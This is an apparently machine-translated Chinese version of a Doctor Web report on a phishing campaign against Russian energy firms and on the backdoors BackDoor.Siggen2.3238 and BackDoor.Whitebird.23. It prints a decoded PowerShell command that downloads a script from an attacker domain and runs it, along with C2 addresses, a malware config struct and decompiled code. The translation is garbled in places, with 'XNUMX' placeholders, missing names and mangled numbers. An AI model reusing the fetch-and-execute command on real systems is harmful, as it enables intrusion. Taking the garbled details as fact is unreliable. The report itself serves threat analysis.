我们调查计算机安全事件的经验表明,电子邮件仍然是攻击者最初渗透受攻击网络基础设施的最常见渠道之一。 对可疑(或不那么可疑)信件的粗心操作会成为进一步感染的切入点,这就是网络犯罪分子积极使用社会工程方法的原因,尽管取得了不同程度的成功。
在这篇文章中,我们想谈谈我们最近对针对俄罗斯燃料和能源综合体多家企业的垃圾邮件活动的调查。 所有攻击都遵循相同的场景,使用虚假电子邮件,而且似乎没有人对这些电子邮件的文本内容投入太多精力。
勘探
这一切都始于 2020 年 XNUMX 月底,当时 Doctor Web 病毒分析师检测到一次垃圾邮件活动,其中黑客向俄罗斯燃料和能源综合体多家企业的员工发送了更新的电话簿。 当然,这并不是简单的关心,因为该目录不是真实的,并且 .docx 文档从远程资源下载了两个图像。
其中一份是从 news[.]zannews[.]com 服务器下载到用户的计算机上的。 值得注意的是,该域名与哈萨克斯坦反腐败媒体中心的域名类似——zannews[.]kz。 另一方面,所使用的域名立即让人想起 2015 年的另一个名为 TOPNEWS 的活动,该活动使用了 ICEFOG 后门,并拥有名称中带有子字符串“news”的木马控制域。 另一个有趣的功能是,当向不同收件人发送电子邮件时,下载图像的请求使用不同的请求参数或唯一的图像名称。
我们认为这样做的目的是收集信息以识别“可靠”的收件人,然后保证他在正确的时间打开这封信。 SMB 协议用于从第二台服务器下载图像,这可以从打开收到文档的员工的计算机中收集 NetNTLM 哈希值。
这是信本身和假目录:
今年2019月,黑客开始使用新域名sports[.]manhajnews[.]com来上传图片。 分析显示,至少自 XNUMX 年 XNUMX 月起,manhajnews[.]com 子域就已被用于垃圾邮件。 此次活动的目标之一是俄罗斯一所大型大学。
此外,到了 XNUMX 月,攻击的组织者为他们的信函提出了新的文本:这次文件包含有关行业发展的信息。 信中的文字清楚地表明,其作者要么不是俄语的母语,要么是故意给自己制造这样的印象。 不幸的是,行业发展的想法一如既往,结果只是一个幌子——文档再次下载了两张图片,而服务器则改为download[.]inklingpaper[.]com。
下一次创新是在七月。 为了绕过防病毒程序对恶意文档的检测,攻击者开始使用使用密码加密的 Microsoft Word 文档。 与此同时,攻击者决定使用一种经典的社会工程技术——奖励通知。
上诉案的文字再次采用同样的风格,这引起了收件人的进一步怀疑。 下载图像的服务器也没有改变。
请注意,在所有情况下,均使用在 mail[.]ru 和 yandex[.]ru 域上注册的电子邮箱来发送信件。
攻击
到 2020 年 XNUMX 月初,是时候采取行动了。 我们的病毒分析师记录了新一波攻击,攻击者再次以更新电话簿为借口发送信件。 然而,这次附件包含恶意宏。
打开附加文档时,宏创建了两个文件:
- VBS 脚本 %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs,用于启动批处理文件;
- 批处理文件本身为 %APPDATA%configstest.bat,已被混淆。
其工作的本质归结为使用某些参数启动 Powershell shell。 传递给 shell 的参数被解码为命令:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;根据所提供的命令,下载有效负载的域再次伪装成新闻站点。 一个简单的 ,其唯一任务是从命令和控制服务器接收 shellcode 并执行它。 我们能够识别出两种可以安装在受害者电脑上的后门。
后门.Siggen2.3238
第一个是 后门.Siggen2.3238 — 我们的专家以前没有遇到过,其他防病毒供应商也没有提到过这个程序。
该程序是一个用C++编写的后门程序,运行在32位Windows操作系统上。
后门.Siggen2.3238 能够使用两种协议与管理服务器进行通信:HTTP 和 HTTPS。 测试样本使用HTTPS协议。 以下用户代理用于向服务器发出请求:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
在这种情况下,所有请求都提供以下参数集:
%s;type=%s;length=%s;realdata=%send
其中每行 %s 相应地替换为:
- 受感染计算机的 ID、
- 发送的请求类型,
- realdata 字段中的数据长度,
- 数据。
在收集有关受感染系统的信息的阶段,后门会生成如下行:
lan=%s;cmpname=%s;username=%s;version=%s;
其中 lan 是受感染计算机的 IP 地址,cmpname 是计算机名称,username 是用户名,version 是行 0.0.4.03。
此带有 sysinfo 标识符的信息通过 POST 请求发送到位于 https[:]//31.214[.]157.14/log.txt 的控制服务器。 如果响应 后门.Siggen2.3238 收到HEART信号,则认为连接成功,后门开始与服务器通信的主周期。
更完整的工作原理描述 后门.Siggen2.3238 是在我们的 .
后门.Whitebird.23
第二个程序是对 BackDoor.Whitebird 后门的修改,我们已经从哈萨克斯坦一家政府机构的事件中了解到该后门。 该版本是用 C++ 编写的,旨在在 32 位和 64 位 Windows 操作系统上运行。
与大多数此类程序一样, 后门.Whitebird.23 旨在与控制服务器建立加密连接并对受感染的计算机进行未经授权的控制。 使用滴管安装到受感染的系统中 .
我们检查的样本是一个具有两个导出的恶意库:
- 谷歌游戏
- 试验。
在工作开始时,它使用基于字节 0x99 的 XOR 运算的算法来解密硬连线到后门主体中的配置。 配置如下:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
为了保证其持续运行,后门会更改字段中指定的值 工作时间 配置。 该字段包含1440个字节,取值0或1,代表一天中每小时的每一分钟。 为每个网络接口创建一个单独的线程,用于侦听该接口并在代理服务器上查找来自受感染计算机的授权数据包。 当检测到此类数据包时,后门会将有关代理服务器的信息添加到其列表中。 此外,还通过 WinAPI 检查代理是否存在 互联网查询选项W.
程序检查当前的分钟和小时,并将其与现场数据进行比较 工作时间 配置。 如果当天相应分钟的值不为零,则与控制服务器建立连接。
建立与服务器的连接模拟在客户端和服务器之间使用 TLS 版本 1.0 协议创建连接。 后门的主体包含两个缓冲区。
第一个缓冲区包含 TLS 1.0 客户端 Hello 数据包。
第二个缓冲区包含密钥长度为 1.0x0 字节的 TLS 100 客户端密钥交换数据包、更改密码规范、加密握手消息。
后门在发送Client Hello数据包时,会在Client Random字段中写入4个字节的当前时间和28个字节的伪随机数据,计算如下:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
接收到的数据包被发送到控制服务器。 响应(服务器 Hello 数据包)检查:
- 符合TLS协议1.0版;
- 客户端指定的时间戳(随机数据包字段的前4个字节)与服务器指定的时间戳的对应关系;
- 客户端和服务器的随机数据字段中时间戳后的前 4 个字节的匹配。
如果指定的匹配项,后门会准备客户端密钥交换数据包。 为此,它修改客户端密钥交换包中的公钥,以及加密握手消息包中的加密 IV 和加密数据。
然后,后门从命令和控制服务器接收数据包,检查 TLS 协议版本是否为 1.0,然后接受另外 54 个字节(数据包的正文)。 这样就完成了连接设置。
更完整的工作原理描述 后门.Whitebird.23 是在我们的 .
结论与结论
通过对文档、恶意软件和所使用的基础设施的分析,我们可以自信地说,这次攻击是由中国 APT 组织之一策划的。 考虑到攻击成功后安装在受害者计算机上的后门的功能,感染至少会导致受攻击组织的计算机上的机密信息被盗。
此外,一种很可能的情况是在本地服务器上安装具有特殊功能的专门木马。 这些可以是域控制器、邮件服务器、Internet 网关等。正如我们在示例中看到的 ,由于各种原因,攻击者对此类服务器特别感兴趣。
来源: habr.com